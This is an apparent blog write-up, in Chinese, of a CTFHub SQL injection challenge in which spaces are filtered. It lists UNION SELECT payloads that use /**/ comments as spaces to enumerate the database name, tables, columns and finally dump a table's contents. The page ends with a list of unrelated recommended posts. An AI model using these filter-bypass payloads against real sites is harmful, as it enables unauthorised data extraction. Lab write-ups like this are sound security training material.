CTFHUB-SQL注入-过滤空格

目录

查询数据库名

查询数据库中的表

查询表中字段

查询表中数据


空格被过滤,使用 /**/ 绕过

查询数据库名

复制代码
-1/**/union/**/select/**/1,database()

查询数据库中的表

复制代码
-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()

查询表中字段

复制代码
-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='iweunwnolg'

查询表中数据

复制代码
-1/**/union/**/select/**/1,group_concat(abhijtmzdc)/**/from/**/iweunwnolg
相关推荐
写代码的小王吧11 分钟前
【安全】Java幂等性校验解决重复点击(6种实现方式)
java·linux·开发语言·安全·web安全·网络安全·音视频
半路_出家ren40 分钟前
VRRP(虚拟路由器冗余协议)、虚拟路由器、master路由器、backup路由器
网络·网络安全·路由器·网络设备·vrrp·master路由器·backup路由器
Hi_Lyn1 小时前
MySQL表的增删改查基础版
数据库·mysql
Feng.Lee1 小时前
如何判断数据来源缓存还是数据库
数据库·缓存
vortex52 小时前
Bash中因数值比较引发的提权漏洞:数组注入与任意命令执行
linux·开发语言·安全·网络安全·渗透测试·bash
随缘而动,随遇而安2 小时前
第四十篇 企业级数据仓库建模深度实践:从理论到落地的维度建模全攻略
大数据·数据库·数据仓库·数据分析·数据库架构
审计侠2 小时前
Apache Struts2 漏洞(CVE-2017-5638)技术分析
java·struts·web安全·apache·安全性测试
小小鸭程序员2 小时前
Spring Boot整合MyBatis-Plus实现CRUD操作教程
java·spring boot·python·mysql·spring
斯密码赛我是美女3 小时前
文件上传漏洞
安全·web安全
一口一个橘子3 小时前
[ctfshow web入门] web5
web安全·网络安全